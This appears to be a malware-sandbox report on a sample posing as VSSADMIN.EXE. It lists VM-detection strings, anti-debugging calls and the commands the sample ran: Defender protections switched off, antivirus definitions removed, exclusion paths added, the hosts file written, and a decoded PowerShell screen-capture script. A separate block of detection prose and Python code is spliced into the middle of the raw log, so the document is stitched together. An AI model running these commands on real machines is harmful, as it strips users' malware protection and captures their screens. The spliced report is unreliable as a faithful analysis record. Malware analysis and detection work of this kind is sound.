              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6160Thread sleep count: 7602 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7152Thread sleep count: 1813 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5724Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6128Thread sleep count: 7400 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7164Thread sleep count: 1939 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5712Thread sleep time: -5534023222112862s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6940Thread sleep count: 3406 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6940Thread sleep count: 1109 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6936Thread sleep time: -9223372036854770s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6956Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6916Thread sleep time: -11068046444225724s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6944Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5732Thread sleep count: 3538 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7140Thread sleep count: 1963 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7028Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6592Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7024Thread sleep count: 3602 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4996Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6932Thread sleep count: 663 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6228Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7080Thread sleep count: 1769 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7080Thread sleep count: 1516 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5812Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5316Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6964Thread sleep count: 2819 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6928Thread sleep count: 394 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6644Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5340Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7602
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1813
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7400
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1939
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3406
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1109
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2837
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1332
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3538
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1963
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3602
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 663
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1769
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1516
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2819
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 394
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeAPI coverage: 5.8 %
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ozweafg0\ozweafg0.dll
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68562\_decimal.pyd
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FFD3FBF4246 rdtsc 1_2_00007FFD3FBF4246
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFCDFBE7143 sldt word ptr [eax]8_2_00007FFCDFBE7143
              Source: VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxtray
              Source: VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxservice
              Source: VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: qemu-ga
              Source: VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware
              Source: VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareservicer`
              Source: VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareuser
              Source: VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmusrvc
              Source: VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmsrvc
              Source: VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmtoolsd
              Source: VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwarec
              Source: rar.exe, 0000003B.00000003.227944393.000002A7EDA83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}
              Source: VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware@
              Source: VSSADMIN.EXE.exe, 00000001.00000002.244670872.0000014C6C9B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc!
              Source: VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwaretray
              Source: VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwaretray@
              Source: VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareservice
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C86744 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF614C86744
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C77850 FindFirstFileExW,FindClose,0_2_00007FF614C77850
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C909E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF614C909E4
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FF614C86744 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,1_2_00007FF614C86744
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FF614C77850 FindFirstFileExW,FindClose,1_2_00007FF614C77850
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FF614C909E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF614C909E4
              Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exeCode function: 59_2_00007FF6EE7546EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,59_2_00007FF6EE7546EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exeCode function: 59_2_00007FF6EE7988E0 FindFirstFileExA,59_2_00007FF6EE7988E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exeCode function: 59_2_00007FF6EE74E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,59_2_00007FF6EE74E21C

              Anti Debugging

              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FFD3FBF42461_2_00007FFD3FBF4246
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FFD3FBF57311_2_00007FFD3FBF5731
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FFD3FF45510 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,1_2_00007FFD3FF45510
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C7B6CC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF614C7B6CC
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C925D0 GetProcessHeap,0_2_00007FF614C925D0
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FFD3FBF4246 rdtsc 1_2_00007FFD3FBF4246
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C7B1B0 SetUnhandledExceptionFilter,_invalid_parameter_noinfo,0_2_00007FF614C7B1B0
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C7AE30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF614C7AE30
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C7B6CC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF614C7B6CC
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C7B8B0 SetUnhandledExceptionFilter,0_2_00007FF614C7B8B0
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C89B14 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF614C89B14
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FF614C7B1B0 SetUnhandledExceptionFilter,_invalid_parameter_noinfo,1_2_00007FF614C7B1B0
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FF614C7AE30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FF614C7AE30
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FF614C7B6CC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF614C7B6CC
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FF614C7B8B0 SetUnhandledExceptionFilter,1_2_00007FF614C7B8B0
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FF614C89B14 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF614C89B14
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FFD3FBF5A24 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFD3FBF5A24
              Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exeCode function: 59_2_00007FF6EE78B0E0 SetUnhandledExceptionFilter,_invalid_parameter_noinfo,59_2_00007FF6EE78B0E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exeCode function: 59_2_00007FF6EE794C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,59_2_00007FF6EE794C10
              Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exeCode function: 59_2_00007FF6EE78B6D8 SetUnhandledExceptionFilter,59_2_00007FF6EE78B6D8
              Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exeCode function: 59_2_00007FF6EE78A66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,59_2_00007FF6EE78A66C
              Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exeCode function: 59_2_00007FF6EE78B52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,59_2_00007FF6EE78B52C

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Windows\System32\cmd.exe | Process created: Base64 decoded (2 identical entries; the decoded PowerShell script, with its original line breaks restored):
                  $source = @"
                  using System;
                  using System.Collections.Generic;
                  using System.Drawing;
                  using System.Windows.Forms;

                  public class Screenshot
                  {
                      public static List<Bitmap> CaptureScreens()
                      {
                          var results = new List<Bitmap>();
                          var allScreens = Screen.AllScreens;

                          foreach (Screen screen in allScreens)
                          {
                              try
                              {
                                  Rectangle bounds = screen.Bounds;
                                  using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height))
                                  {
                                      using (Graphics graphics = Graphics.FromImage(bitmap))
                                      {
                                          graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);
                                      }

                                      results.Add((Bitmap)bitmap.Clone());
                                  }
                              }
                              catch (Exception)
                              {
                                  // Handle any exceptions here
                              }
                          }

                          return results;
                      }
                  }
                  "@

                  Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms

                  $screenshots = [Screenshot]::CaptureScreens()

                  for ($i = 0; $i -lt $screenshots.Count; $i++)
                  {
                      $screenshot = $screenshots[$i]
                      $screenshot.Save("./Display ($($i+1)).png")
                      $screenshot.Dispose()
                  }
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" (2 identical entries)
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All (2 identical entries)
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: C:\Users\user\AppData\Local\Temp\_MEI68562\VCRUNTIME140.dll (7 identical entries)
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VSSADMIN.EXE.exe'" (2 identical entries)
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VSSADMIN.EXE.exe' (2 identical entries)
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ???.scr'" (2 identical entries)
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ???.scr' (2 identical entries)
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | File written: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" (10 identical entries)
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend (10 identical entries)
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
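The entries above are what a detection engineer would key on: Set-MpPreference with the protection switches forced off, Add-MpPreference adding the dropper and its StartUp copy to the exclusion list, MpCmdRun.exe -RemoveDefinitions -All, and a PowerShell -EncodedCommand launched with -ExecutionPolicy Bypass. The following is an added example, not code from Joe Sandbox or from the Blank Grabber project: it runs that logic over constructed process-creation records (the field names image and command_line are an assumption, modelled on Sysmon event 1), and it decodes -EncodedCommand payloads, which are base64 of UTF-16LE text. Note the lower-cased copies of these command lines a few entries further up: case-folding a base64 token destroys it, so the decoder reports those as undecodable rather than guessing.

```python
# Added example (not Joe Sandbox or Blank Grabber code): detection logic for the
# Defender-tampering and encoded-PowerShell entries above, run over constructed
# process-creation records. Field names (image, command_line) are assumptions.
import base64
import binascii
import re
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class Finding:
    rule: str
    detail: str = ""


# Set-MpPreference switches that weaken Defender when given these values.
_DISABLE_SWITCHES = re.compile(
    r"-(?:DisableRealtimeMonitoring|DisableIOAVProtection|DisableScriptScanning"
    r"|DisableIntrusionPreventionSystem)\s+\$true"
    r"|-MAPSReporting\s+Disabled"
    r"|-SubmitSamplesConsent\s+(?:NeverSend|2)\b"
    r"|-EnableControlledFolderAccess\s+Disabled",
    re.IGNORECASE)
# -EncodedCommand and the abbreviations PowerShell accepts for it.
_ENCODED = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(token: str) -> Optional[str]:
    """Decode a -EncodedCommand argument (base64 of UTF-16LE text).

    Returns None unless the result looks like a script (mostly printable ASCII).
    A token that was case-folded by a logging pipeline, like the lower-cased
    copies in the report above, fails this check: every base64 sextet becomes
    >= 26, so every decoded byte is non-zero and no code unit can be ASCII."""
    try:
        text = base64.b64decode(token, validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None
    ascii_like = sum(1 for c in text if c.isascii() and (c.isprintable() or c.isspace()))
    return text if text and ascii_like / len(text) >= 0.9 else None


def inspect_process(image: str, command_line: str) -> List[Finding]:
    """Apply the rules to one process-creation record."""
    findings: List[Finding] = []
    img, cl = image.lower(), command_line
    if img.endswith("powershell.exe") or "powershell" in cl.lower():
        if re.search(r"\bSet-MpPreference\b", cl, re.I):
            hits = [m.group(0) for m in _DISABLE_SWITCHES.finditer(cl)]
            if hits:
                findings.append(Finding("defender_protection_disabled", ", ".join(hits)))
        m = re.search(r"\bAdd-MpPreference\b.*?-ExclusionPath\s+'?([^']+)'?", cl, re.I)
        if m:
            findings.append(Finding("defender_exclusion_added", m.group(1).strip()))
        if re.search(r"-ExecutionPolicy\s+Bypass\b", cl, re.I):
            findings.append(Finding("execution_policy_bypass"))
        m = _ENCODED.search(cl)
        if m:
            script = decode_encoded_command(m.group(1))
            if script is None:
                findings.append(Finding("encoded_command", "undecodable"))
            elif "Add-Type" in script and "CopyFromScreen" in script:
                findings.append(Finding("encoded_command", "screenshot capture (Add-Type + CopyFromScreen)"))
            else:
                findings.append(Finding("encoded_command", "decoded"))
    if img.endswith("mpcmdrun.exe") and re.search(r"-RemoveDefinitions\b", cl, re.I):
        findings.append(Finding("defender_definitions_removed"))
    return findings


# Constructed samples modelled on the entries above (not copied from the sandbox log).
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_DISABLE = ("powershell Set-MpPreference -DisableIntrusionPreventionSystem $true "
                  "-DisableIOAVProtection $true -DisableRealtimeMonitoring $true "
                  "-DisableScriptScanning $true -EnableControlledFolderAccess Disabled "
                  "-EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled "
                  "-SubmitSamplesConsent NeverSend")
SAMPLE_EXCLUSION = r"powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VSSADMIN.EXE.exe'"
SAMPLE_MPCMDRUN = r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All'
# A short stand-in for the screenshot script; encoded here exactly as PowerShell expects it.
_SCRIPT = ("Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms\n"
           "$g.CopyFromScreen($bounds.Location, [System.Drawing.Point]::Empty, $bounds.Size)\n")
SAMPLE_ENCODED = ("powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand "
                  + base64.b64encode(_SCRIPT.encode("utf-16le")).decode("ascii"))

if __name__ == "__main__":
    for cl in (SAMPLE_DISABLE, SAMPLE_EXCLUSION, SAMPLE_ENCODED, SAMPLE_ENCODED.lower()):
        print(inspect_process(PS_IMAGE, cl))
    print(inspect_process(r"C:\Program Files\Windows Defender\MpCmdRun.exe", SAMPLE_MPCMDRUN))
```

The practical caveat is in the last sample: if the log source normalises command lines to lower case, the encoded payload is gone for good, so keep the original-case command line alongside any normalised copy used for matching. The ASCII-ratio threshold is a heuristic of this example, not a PowerShell rule; scripts with a lot of non-ASCII text would need it relaxed.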
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaa